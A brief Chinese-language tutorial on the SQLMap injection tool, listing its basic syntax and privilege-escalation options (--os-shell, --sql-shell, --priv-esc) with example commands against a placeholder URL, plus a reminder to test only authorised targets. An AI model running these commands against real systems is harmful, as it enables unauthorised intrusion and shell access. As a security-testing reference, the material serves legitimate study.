SQLMap是一款自动化SQL注入检测与利用工具,以下是其核心语法、常用参数及典型场景说明,兼顾实用性与安全性规范:
一、基础语法结构
|----------------------|
| sqlmap 选项 <目标> |
<目标>可以是URL、文件、请求包等多种形式,是SQLMap的核心输入源。
二、核心参数分类详解
权限提升参数
| 参数 | 说明 | 示例 |
|---|---|---|
--os-shell |
获取操作系统Shell | sqlmap.py -u "http://example.com?id=1" --os-shell |
--sql-shell |
获取数据库Shell | sqlmap.py -u "http://example.com?id=1" --sql-shell |
--priv-esc |
尝试数据库权限提升 | sqlmap.py -u "http://example.com?id=1" --priv-esc |
注:仅对拥有合法授权的目标使用SQLMap,未经授权的测试可能违反法律法规